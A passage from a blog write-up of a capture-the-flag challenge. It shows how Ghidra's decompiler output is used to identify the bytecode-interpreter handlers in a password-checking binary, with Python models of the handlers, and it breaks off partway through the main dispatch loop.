<h1>Efficiency: Reverse Engineering with ghidra</h1>
<p>Wannes Rombouts, 2019-10-10, <a href="https://wapiflapi.github.io/2019/10/10/efficiency-reverse-engineering-with-ghidra">wapiflapi.github.io</a></p>
<p>It’s been a while since I’ve written anything on here, but I
thought I’d do a quick write-up for one of the challenges from
<a href="https://qual.rtfm.re/rules">RTFM</a>.</p>
<p>We’re given a single binary and told to find a flag. The executable
is a 64-bit ELF that prompts for a password when run:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>~/Projects/ctf/rtfm$ file efficiency_fixed
efficiency_fixed: ELF 64-bit LSB shared object, x86-64, ...
~/Projects/ctf/rtfm$ ./efficiency_fixed
Please enter the password:
foobar
</code></pre></div></div>
<p>We don’t get any more output after we enter the “password”
(<code class="highlighter-rouge">foobar</code> in the example above).</p>
<h2 id="enter-ghidra">Enter <a href="https://github.com/NationalSecurityAgency/ghidra">Ghidra</a></h2>
<p>I’m going to be using Ghidra for the reverse engineering but other
tools work in similar ways and this write-up could probably be
followed with any of them.</p>
<p>After creating a project in Ghidra for the CTF (or just using your
everything-goes-here project) and using <code class="highlighter-rouge">File > Import File</code> to
add our binary to it, we can open the binary and tell Ghidra that <code class="highlighter-rouge">Yes</code>, we
would like to analyze the file right now when prompted.</p>
<p>In the <code class="highlighter-rouge">Symbol Tree</code> we notice there are only a dozen functions we
don’t recognize so let’s start looking at what they do.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">FUN_00101020</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
<span class="c1">// WARNING: Treating indirect jump as call</span>
<span class="p">(</span><span class="o">*</span><span class="p">(</span><span class="n">code</span> <span class="o">*</span><span class="p">)(</span><span class="n">undefined</span> <span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">)();</span>
<span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Okay. Looking at the listing (assembly) for this we see it’s an
indirect jump to something taken at a global address. This function
also doesn’t seem to be referenced by any of the others. Let’s skip
this for now, probably not important.</p>
<h3 id="lots-of-small-functions">Lots of small functions</h3>
<p><code class="highlighter-rouge">FUN_001010a0</code> and <code class="highlighter-rouge">FUN_001010d0</code> are no more interesting than the
previous one, but then we have a whole lot of very small functions
that seem to actually do stuff.</p>
<p><strong>Most of them take two arguments and do a very simple operation.</strong>
This looks a lot like the naive implementation of byte-code
interpreters we are used to seeing in CTFs. Let’s rename all those
functions to what we assume they’ll be doing:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">FUN_00101155</span><span class="p">(</span><span class="n">undefined4</span> <span class="o">*</span><span class="n">puParm1</span><span class="p">,</span> <span class="n">undefined4</span> <span class="o">*</span><span class="n">puParm2</span><span class="p">)</span> <span class="p">{</span>
<span class="o">*</span><span class="n">puParm1</span> <span class="o">=</span> <span class="o">*</span><span class="n">puParm2</span><span class="p">;</span>
<span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p><code class="highlighter-rouge">FUN_00101155</code> seems to be some sort of <code class="highlighter-rouge">mov</code> instruction. Let’s
rename it to <code class="highlighter-rouge">do_mov_aX_bX</code>. I like being explicit about the number of
arguments they take (following “destination before source” convention)
and about whether they dereference them or not. The <code class="highlighter-rouge">X</code> indicates those
arguments are dereferenced which would be obvious for the destination
(a) but not so much for the source (b). At this point you could also
take the time to update the function prototypes in Ghidra, letting it
know that they take <code class="highlighter-rouge">(int *, int *)</code> (for most of them.)</p>
<p>If we do the same for all the little functions we end up with:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">do_mov_aX_bX</span><span class="p">(</span><span class="n">undefined4</span> <span class="o">*</span><span class="n">puParm1</span><span class="p">,</span> <span class="n">undefined4</span> <span class="o">*</span><span class="n">puParm2</span><span class="p">)</span> <span class="p">{</span>
<span class="o">*</span><span class="n">puParm1</span> <span class="o">=</span> <span class="o">*</span><span class="n">puParm2</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">do_mov_aX_b</span><span class="p">(</span><span class="n">undefined4</span> <span class="o">*</span><span class="n">puParm1</span><span class="p">,</span> <span class="n">undefined4</span> <span class="n">uParm2</span><span class="p">)</span> <span class="p">{</span>
<span class="o">*</span><span class="n">puParm1</span> <span class="o">=</span> <span class="n">uParm2</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">do_xor_aX_bX</span><span class="p">(</span><span class="n">uint</span> <span class="o">*</span><span class="n">puParm1</span><span class="p">,</span> <span class="n">uint</span> <span class="o">*</span><span class="n">puParm2</span><span class="p">)</span> <span class="p">{</span>
<span class="o">*</span><span class="n">puParm1</span> <span class="o">=</span> <span class="o">*</span><span class="n">puParm1</span> <span class="o">^</span> <span class="o">*</span><span class="n">puParm2</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">do_add_aX_bX</span><span class="p">(</span><span class="kt">int</span> <span class="o">*</span><span class="n">piParm1</span><span class="p">,</span> <span class="kt">int</span> <span class="o">*</span><span class="n">piParm2</span><span class="p">)</span> <span class="p">{</span>
<span class="o">*</span><span class="n">piParm1</span> <span class="o">=</span> <span class="o">*</span><span class="n">piParm1</span> <span class="o">+</span> <span class="o">*</span><span class="n">piParm2</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">do_sub_aX_bX</span><span class="p">(</span><span class="kt">int</span> <span class="o">*</span><span class="n">piParm1</span><span class="p">,</span> <span class="kt">int</span> <span class="o">*</span><span class="n">piParm2</span><span class="p">)</span> <span class="p">{</span>
<span class="o">*</span><span class="n">piParm1</span> <span class="o">=</span> <span class="o">*</span><span class="n">piParm1</span> <span class="o">-</span> <span class="o">*</span><span class="n">piParm2</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">do_rol_aX_bX</span><span class="p">(</span><span class="kt">int</span> <span class="o">*</span><span class="n">piParm1</span><span class="p">,</span> <span class="n">undefined8</span> <span class="n">uParm2</span><span class="p">)</span> <span class="p">{</span>
<span class="o">*</span><span class="n">piParm1</span> <span class="o">=</span> <span class="o">*</span><span class="n">piParm1</span> <span class="o"><<</span> <span class="p">((</span><span class="n">byte</span><span class="p">)</span><span class="n">uParm2</span> <span class="o">&</span> <span class="mh">0x1f</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">do_ror_aX_bX</span><span class="p">(</span><span class="kt">int</span> <span class="o">*</span><span class="n">piParm1</span><span class="p">,</span> <span class="n">undefined8</span> <span class="n">uParm2</span><span class="p">)</span> <span class="p">{</span>
<span class="o">*</span><span class="n">piParm1</span> <span class="o">=</span> <span class="o">*</span><span class="n">piParm1</span> <span class="o">>></span> <span class="p">((</span><span class="n">byte</span><span class="p">)</span><span class="n">uParm2</span> <span class="o">&</span> <span class="mh">0x1f</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
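<p>To sanity-check these guesses outside of Ghidra, the handlers can be
modelled in a few lines of Python. This is only a sketch under
assumptions: the operands are taken to be 32-bit values living in a
plain list, and <code class="highlighter-rouge">regs</code>, <code class="highlighter-rouge">MASK32</code> and the index-based arguments are made up
for illustration. Note that the decompiled bodies of <code class="highlighter-rouge">do_rol_aX_bX</code> and
<code class="highlighter-rouge">do_ror_aX_bX</code> are shifts with an immediate count rather than true
rotates, and the sketch follows the decompilation, not the names.</p>

```python
MASK32 = 0xFFFFFFFF  # assumption: operands are 32 bits wide, as the int/uint types suggest


def do_mov_aX_b(regs, a, b):
    # *a = b, where b is an immediate value
    regs[a] = b & MASK32


def do_mov_aX_bX(regs, a, b):
    # *a = *b
    regs[a] = regs[b]


def do_xor_aX_bX(regs, a, b):
    regs[a] ^= regs[b]


def do_add_aX_bX(regs, a, b):
    regs[a] = (regs[a] + regs[b]) & MASK32


def do_sub_aX_bX(regs, a, b):
    regs[a] = (regs[a] - regs[b]) & MASK32


def do_rol_aX_bX(regs, a, count):
    # Decompiled as a plain left shift with the count masked to 5 bits.
    regs[a] = (regs[a] << (count & 0x1F)) & MASK32


def do_ror_aX_bX(regs, a, count):
    # Decompiled as `>>` on an int, i.e. an arithmetic (sign-preserving) shift.
    value = regs[a] - (1 << 32) if regs[a] & 0x80000000 else regs[a]
    regs[a] = (value >> (count & 0x1F)) & MASK32
```

<p>Indexing a list instead of passing pointers keeps the model short.
Whether the real operands are indices into one table is an assumption
at this point in the analysis.</p>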
<h3 id="dealing-with-global-variables">Dealing with global variables</h3>
<p>The functions above all follow the exact same pattern so it’s easy to
name them. We also encounter some of those small functions that read
and write to some global <code class="highlighter-rouge">DAT_something</code> variables. Let’s just
continue with our naming scheme until we find anything better to do:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">do_mov_DAT_0010506c_aX</span><span class="p">(</span><span class="n">undefined4</span> <span class="o">*</span><span class="n">puParm1</span><span class="p">)</span> <span class="p">{</span>
<span class="n">DAT_0010506c</span> <span class="o">=</span> <span class="o">*</span><span class="n">puParm1</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">do_mov_DAT_00105068_cmp_aX_bX</span><span class="p">(</span><span class="kt">int</span> <span class="o">*</span><span class="n">piParm1</span><span class="p">,</span> <span class="kt">int</span> <span class="o">*</span><span class="n">piParm2</span><span class="p">)</span> <span class="p">{</span>
<span class="n">DAT_00105068</span> <span class="o">=</span> <span class="o">*</span><span class="n">piParm1</span> <span class="o">!=</span> <span class="o">*</span><span class="n">piParm2</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>With that last one we’re starting to see that those global variables
might be used to store things like flags and important information
about the state of the virtual machine that might (we’re guessing!)
be running inside this binary.</p>
<p>Our suspicions are confirmed by the following three functions which
look an awful lot like (unconditional) <code class="highlighter-rouge">jmp</code>, <code class="highlighter-rouge">jnz</code> (jmp if non zero)
and <code class="highlighter-rouge">jz</code> (jmp if zero).</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
<span class="kt">void</span> <span class="nf">do_jmp_a</span><span class="p">(</span><span class="n">undefined4</span> <span class="n">uParm1</span><span class="p">)</span> <span class="p">{</span>
<span class="n">DAT_00105064</span> <span class="o">=</span> <span class="n">uParm1</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">do_jnz_a</span><span class="p">(</span><span class="n">undefined4</span> <span class="n">uParm1</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">DAT_00105068</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
<span class="n">DAT_00105064</span> <span class="o">=</span> <span class="n">uParm1</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">do_jz_a</span><span class="p">(</span><span class="n">undefined4</span> <span class="n">uParm1</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">DAT_00105068</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
<span class="n">DAT_00105064</span> <span class="o">=</span> <span class="n">uParm1</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
<p><strong>We are now presuming the following:</strong></p>
<ul>
<li><code class="highlighter-rouge">DAT_00105068</code> is actually a global <code class="highlighter-rouge">SHOULDJMP</code> flag.</li>
<li><code class="highlighter-rouge">DAT_00105064</code> is what the jumps modify, so it’s reasonable
to assume it is the current instruction pointer <code class="highlighter-rouge">DATA_IP</code>.</li>
</ul>
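<p>The interplay between the compare flag and the jumps can be sketched
like this. It is a minimal model, assuming the two globals behave as
guessed above. The <code class="highlighter-rouge">VMState</code> class, its attribute names and the
list-based <code class="highlighter-rouge">regs</code> are hypothetical helpers, not something found in the
binary.</p>

```python
class VMState:
    """Hypothetical container for the two globals guessed above."""

    def __init__(self):
        self.should_jmp = 0  # DAT_00105068, written by the cmp handler
        self.ip = 0          # DAT_00105064, written by the jump handlers


def do_cmp_aX_bX(state, regs, a, b):
    # The flag is 1 when the operands differ and 0 when they are equal.
    state.should_jmp = int(regs[a] != regs[b])


def do_jmp_a(state, target):
    state.ip = target


def do_jnz_a(state, target):
    if state.should_jmp != 0:
        state.ip = target


def do_jz_a(state, target):
    if state.should_jmp == 0:
        state.ip = target
```

<p>Because the flag stores “not equal”, <code class="highlighter-rouge">do_jz_a</code> is the jump taken when
the two compared values were equal, and <code class="highlighter-rouge">do_jnz_a</code> the one taken when
they differed.</p>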
<p>We still haven’t seen anything resembling the main function, or
whatever it is that is prompting us for a password when running the
binary. We could go searching for that, but let’s just finish all the
functions in order since we’re almost done anyway.</p>
<h3 id="fun_001012c6---re-discovering-mathematics">FUN_001012c6 - Re-discovering mathematics.</h3>
<p>The next function is somewhat more complicated than the small
operations we’ve been seeing so far.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">FUN_001012c6</span><span class="p">(</span><span class="kt">int</span> <span class="o">*</span><span class="n">piParm1</span><span class="p">,</span><span class="kt">int</span> <span class="o">*</span><span class="n">piParm2</span><span class="p">)</span> <span class="p">{</span>
<span class="kt">long</span> <span class="n">local_20</span><span class="p">;</span>
<span class="n">ulong</span> <span class="n">local_18</span><span class="p">;</span>
<span class="kt">long</span> <span class="n">local_10</span><span class="p">;</span>
<span class="n">local_10</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
<span class="n">local_18</span> <span class="o">=</span> <span class="n">SEXT48</span><span class="p">(</span><span class="n">DAT_00104074</span><span class="p">);</span>
<span class="n">local_20</span> <span class="o">=</span> <span class="p">(</span><span class="kt">long</span><span class="p">)</span><span class="o">*</span><span class="n">piParm1</span><span class="p">;</span>
<span class="k">while</span> <span class="p">(</span><span class="n">local_18</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">((</span><span class="n">local_18</span> <span class="o">&</span> <span class="mi">1</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
<span class="n">local_10</span> <span class="o">=</span> <span class="n">SUB168</span><span class="p">((</span><span class="n">ZEXT816</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="o"><<</span> <span class="mh">0x40</span> <span class="o">|</span> <span class="n">ZEXT816</span><span class="p">((</span><span class="n">ulong</span><span class="p">)(</span><span class="n">local_10</span> <span class="o">*</span> <span class="n">local_20</span><span class="p">)))</span> <span class="o">%</span>
<span class="n">ZEXT816</span><span class="p">((</span><span class="n">ulong</span><span class="p">)(</span><span class="kt">long</span><span class="p">)</span><span class="o">*</span><span class="n">piParm2</span><span class="p">),</span><span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">local_18</span> <span class="o">>>=</span> <span class="mi">1</span><span class="p">;</span>
<span class="n">local_20</span> <span class="o">=</span> <span class="n">SUB168</span><span class="p">((</span><span class="n">ZEXT816</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="o"><<</span> <span class="mh">0x40</span> <span class="o">|</span> <span class="n">ZEXT816</span><span class="p">((</span><span class="n">ulong</span><span class="p">)(</span><span class="n">local_20</span> <span class="o">*</span> <span class="n">local_20</span><span class="p">)))</span> <span class="o">%</span>
<span class="n">ZEXT816</span><span class="p">((</span><span class="n">ulong</span><span class="p">)(</span><span class="kt">long</span><span class="p">)</span><span class="o">*</span><span class="n">piParm2</span><span class="p">),</span><span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>
<span class="o">*</span><span class="n">piParm1</span> <span class="o">=</span> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">local_10</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p><code class="highlighter-rouge">SEXT48</code>, <code class="highlighter-rouge">SUB168</code> and <code class="highlighter-rouge">ZEXT816</code> are not standard C and might look
weird. <strong>Ghidra’s built-in help is really good and deserves to be used a
lot.</strong></p>
<p>In the Decompiler section we find that:</p>
<blockquote>
<p><strong>SUB41(x,c) - truncation operation</strong>
The 4 is the size of the input operand (x) in bytes.
The 1 is the size of the output value in bytes.
The x is the thing being truncated
The c is the number of least significant bytes being truncated</p>
<p><strong>ZEXT14(x) - zero extension</strong>
The 1 is the size of the operand x
The 4 is the size of the output in bytes
This is almost always a cast from small integer types to big unsigned types.</p>
<p><strong>SEXT14(x) - signed extension</strong>
The 1 is the size of the operand x
The 4 is the size of the output in bytes
This is probably a cast from a small signed integer into a big signed integer.</p>
</blockquote>
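<p>One way to internalize these helpers is to write them down in Python.
The functions below are a rough sketch of the semantics quoted above,
not Ghidra’s implementation. The names <code class="highlighter-rouge">zext</code>, <code class="highlighter-rouge">sext</code> and <code class="highlighter-rouge">sub</code> and
their parameters are invented here, and since Python integers are
unbounded the output size only matters for the truncation.</p>

```python
def zext(value, in_bytes):
    """ZEXTab(x): keep the low in_bytes bytes, upper bytes become zero."""
    return value & ((1 << (8 * in_bytes)) - 1)


def sext(value, in_bytes):
    """SEXTab(x): interpret the low in_bytes bytes as a signed integer."""
    bits = 8 * in_bytes
    value &= (1 << bits) - 1
    return value - (1 << bits) if value >> (bits - 1) else value


def sub(value, out_bytes, skip_bytes):
    """SUBab(x, c): drop skip_bytes low bytes, then keep out_bytes bytes."""
    return (value >> (8 * skip_bytes)) & ((1 << (8 * out_bytes)) - 1)
```

<p>With these definitions <code class="highlighter-rouge">SUB168(x, 0)</code> corresponds to <code class="highlighter-rouge">sub(x, 8, 0)</code>,
which simply keeps the low 8 bytes of a 16-byte intermediate value.</p>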
<p>All this is simply an indication that the compiler had to juggle
between 4 byte, 8 byte and 16 byte operands for the code we’re looking
at. In most cases we probably don’t care about that for understanding
the code so let’s simplify for readability:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">FUN_001012c6</span><span class="p">(</span><span class="kt">int</span> <span class="o">*</span><span class="n">piParm1</span><span class="p">,</span><span class="kt">int</span> <span class="o">*</span><span class="n">piParm2</span><span class="p">)</span> <span class="p">{</span>
<span class="kt">long</span> <span class="n">local_20</span><span class="p">;</span>
<span class="n">ulong</span> <span class="n">bit_vector</span><span class="p">;</span>
<span class="kt">long</span> <span class="n">result</span><span class="p">;</span>
<span class="n">result</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
<span class="n">bit_vector</span> <span class="o">=</span> <span class="n">DAT_00104074</span><span class="p">;</span>
<span class="n">local_20</span> <span class="o">=</span> <span class="o">*</span><span class="n">piParm1</span><span class="p">;</span>
<span class="k">while</span> <span class="p">(</span><span class="n">bit_vector</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">((</span><span class="n">bit_vector</span> <span class="o">&</span> <span class="mi">1</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
<span class="n">result</span> <span class="o">=</span> <span class="p">(</span><span class="n">result</span> <span class="o">*</span> <span class="n">local_20</span><span class="p">)</span> <span class="o">%</span> <span class="o">*</span><span class="n">piParm2</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">bit_vector</span> <span class="o">>>=</span> <span class="mi">1</span><span class="p">;</span>
<span class="n">local_20</span> <span class="o">=</span> <span class="p">(</span><span class="n">local_20</span> <span class="o">*</span> <span class="n">local_20</span><span class="p">)</span> <span class="o">%</span> <span class="o">*</span><span class="n">piParm2</span><span class="p">;</span>
<span class="p">}</span>
<span class="o">*</span><span class="n">piParm1</span> <span class="o">=</span> <span class="n">result</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Notice that we’re looping over all the bits in <code class="highlighter-rouge">bit_vector</code> (originally
<code class="highlighter-rouge">local_18</code>) and computing <code class="highlighter-rouge">local_10</code> (renamed to <code class="highlighter-rouge">result</code>) which gets
assigned to <code class="highlighter-rouge">*piParm1</code> as usual with all the operations we’ve seen so
far. <code class="highlighter-rouge">*piParm2</code> seems to be some sort of modulus as it’s only used for
that.</p>
<p>According to Ghidra, <code class="highlighter-rouge">DAT_00104074</code> is <code class="highlighter-rouge">0x10001</code> and there are no other
direct references to it (apart from the function we’re looking at) that
could modify it, so for now let’s assume that’s a constant.</p>
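<p>Since the loop walks over the bits of this value from least to most
significant, it helps to check which bits are actually set. A quick
sketch, where <code class="highlighter-rouge">EXPONENT</code> and <code class="highlighter-rouge">set_bits</code> are just names picked for this
example:</p>

```python
EXPONENT = 0x10001  # the value Ghidra shows for DAT_00104074

# Positions of the set bits, least significant first (the order the loop visits them).
set_bits = [i for i in range(EXPONENT.bit_length()) if (EXPONENT >> i) & 1]

print(EXPONENT.bit_length())  # 17 bits in total
print(set_bits)               # [0, 16]
```

<p>So only the first and the last of the 17 loop iterations touch the
result, and the 15 iterations in between only square the base.</p>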
<p>Rewriting this function in Python and unrolling the loop:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">do_something</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">):</span>
    <span class="n">result</span> <span class="o">=</span> <span class="mi">1</span>
    <span class="c1"># first bit is always 1
</span>    <span class="n">result</span> <span class="o">=</span> <span class="p">(</span><span class="n">result</span> <span class="o">*</span> <span class="n">a</span><span class="p">)</span> <span class="o">%</span> <span class="n">b</span>
    <span class="n">a</span> <span class="o">=</span> <span class="p">(</span><span class="n">a</span> <span class="o">*</span> <span class="n">a</span><span class="p">)</span> <span class="o">%</span> <span class="n">b</span>
    <span class="c1"># then we always have 15 bits that are 0
</span>    <span class="c1"># a = (a * a) % b # 15 times, which is a ** 2 ** 15
</span>    <span class="n">a</span> <span class="o">=</span> <span class="p">(</span><span class="n">a</span> <span class="o">**</span> <span class="mi">2</span> <span class="o">**</span> <span class="mi">15</span><span class="p">)</span> <span class="o">%</span> <span class="n">b</span>
    <span class="c1"># last bit is always a 1 again
</span>    <span class="n">result</span> <span class="o">=</span> <span class="p">(</span><span class="n">result</span> <span class="o">*</span> <span class="n">a</span><span class="p">)</span> <span class="o">%</span> <span class="n">b</span>
    <span class="n">a</span> <span class="o">=</span> <span class="p">(</span><span class="n">a</span> <span class="o">*</span> <span class="n">a</span><span class="p">)</span> <span class="o">%</span> <span class="n">b</span> <span class="c1"># Notice this line does not affect the result.
</span>
    <span class="k">return</span> <span class="n">result</span>
</code></pre></div></div>
<p>Simplifying the above <em>again</em> we get:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">do_something</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">):</span>
    <span class="n">result</span> <span class="o">=</span> <span class="n">a</span> <span class="o">%</span> <span class="n">b</span>
    <span class="c1"># Now a changes:
</span>    <span class="n">a</span> <span class="o">=</span> <span class="n">a</span> <span class="o">**</span> <span class="mi">2</span> <span class="o">**</span> <span class="mi">16</span> <span class="c1"># because: ((a ** 2) ** 2 ** 15) % b
</span>    <span class="c1"># And is used again in the result:
</span>    <span class="k">return</span> <span class="p">(</span><span class="n">result</span> <span class="o">*</span> <span class="n">a</span><span class="p">)</span> <span class="o">%</span> <span class="n">b</span>
</code></pre></div></div>
<p>Finally we end up with <code class="highlighter-rouge">return (a * a ** 2 ** 16) % b</code></p>
<ul>
<li>which is <code class="highlighter-rouge">return (a ** (2 ** 16 + 1)) % b</code></li>
<li>which is <code class="highlighter-rouge">return (a ** 0x10001) % b</code></li>
</ul>
<p>So <strong>this function is basically just a <code class="highlighter-rouge">do_aX_pow_0x10001_mod_bX</code>
operation</strong> (modular exponentiation). If you couldn’t tell from my way of solving maths
above: I’m not really good at maths.</p>
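<p>If you trust code more than algebra, the conclusion can also be
checked numerically. The sketch below re-implements the simplified loop
and compares it with Python’s built-in three-argument <code class="highlighter-rouge">pow</code>. The
function name and the sample inputs are arbitrary choices, and it
assumes non-negative values small enough that the 64-bit products in the
original never overflow.</p>

```python
def pow_0x10001_mod(a, b, exponent=0x10001):
    """Square-and-multiply loop mirroring the simplified decompilation."""
    result = 1
    base = a
    while exponent != 0:
        if exponent & 1:
            result = (result * base) % b
        exponent >>= 1
        base = (base * base) % b
    return result


# Compare against the built-in modular exponentiation on a few sample inputs.
for a, b in [(2, 1000003), (123456789, 2147483647), (7, 13)]:
    assert pow_0x10001_mod(a, b) == pow(a, 0x10001, b)
```

<p>When emulating the virtual machine later on, <code class="highlighter-rouge">pow(a, 0x10001, b)</code> is
the convenient one-line replacement for this handler.</p>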
<p>And with that it looks like we’re done with all the small-ish
functions that take one or two parameters and store their result in
the first one.</p>
<h3 id="on-to-main">On to main.</h3>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
<span class="n">undefined8</span> <span class="nf">FUN_001017e4</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
<span class="c1">// ...</span>
<span class="n">puts</span><span class="p">(</span><span class="s">"Please enter the password: "</span><span class="p">);</span>
<span class="n">read</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span><span class="o">&</span><span class="n">local_28</span><span class="p">,</span><span class="mh">0x14</span><span class="p">);</span>
<span class="n">FUN_0010138b</span><span class="p">(</span><span class="o">&</span><span class="n">local_28</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Seems like we need to look at <code class="highlighter-rouge">FUN_0010138b</code> next: it takes our password as input.</p>
<p>It’s a big function! It has two <code class="highlighter-rouge">while</code> loops followed by a <code class="highlighter-rouge">do { }
while</code> with lots of <code class="highlighter-rouge">if</code>/<code class="highlighter-rouge">else</code> inside. Looks like we found whatever
it is that’s going to call all of the functions we read before.</p>
<p>Let’s focus on the big mess first:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="k">do</span> <span class="p">{</span>
<span class="n">a</span> <span class="o">=</span> <span class="n">local_data</span><span class="p">[(</span><span class="kt">long</span><span class="p">)(</span><span class="n">DATA_IP</span> <span class="o">+</span> <span class="mi">1</span><span class="p">)];</span>
<span class="n">b</span> <span class="o">=</span> <span class="n">local_data</span><span class="p">[(</span><span class="kt">long</span><span class="p">)(</span><span class="n">DATA_IP</span> <span class="o">+</span> <span class="mi">2</span><span class="p">)];</span>
<span class="n">op</span> <span class="o">=</span> <span class="n">local_data</span><span class="p">[(</span><span class="kt">long</span><span class="p">)</span><span class="n">DATA_IP</span><span class="p">];</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="mh">0x789abcde</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_cmp_ax_bx</span><span class="p">(</span><span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="p">(</span><span class="kt">long</span><span class="p">)</span><span class="n">a</span><span class="p">,</span><span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="p">(</span><span class="kt">long</span><span class="p">)(</span><span class="kt">int</span><span class="p">)</span><span class="n">b</span><span class="p">,</span>
<span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="p">(</span><span class="kt">long</span><span class="p">)(</span><span class="kt">int</span><span class="p">)</span><span class="n">b</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">else</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o"><</span> <span class="mh">0x789abcdf</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="mh">0x6789abcd</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_jmp_a</span><span class="p">();</span>
<span class="p">}</span>
<span class="k">else</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o"><</span> <span class="mh">0x6789abce</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="mh">0x56789abc</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_jz_a</span><span class="p">();</span>
<span class="p">}</span>
<span class="k">else</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o"><</span> <span class="mh">0x56789abd</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="mh">0x456789ab</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_add_aX_bX</span><span class="p">(</span><span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="p">(</span><span class="kt">long</span><span class="p">)</span><span class="n">a</span><span class="p">,</span><span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="p">(</span><span class="kt">long</span><span class="p">)(</span><span class="kt">int</span><span class="p">)</span><span class="n">b</span><span class="p">,</span>
<span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="p">(</span><span class="kt">long</span><span class="p">)(</span><span class="kt">int</span><span class="p">)</span><span class="n">b</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">else</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o"><</span> <span class="mh">0x456789ac</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="mh">0x3456789a</span><span class="p">)</span> <span class="p">{</span>
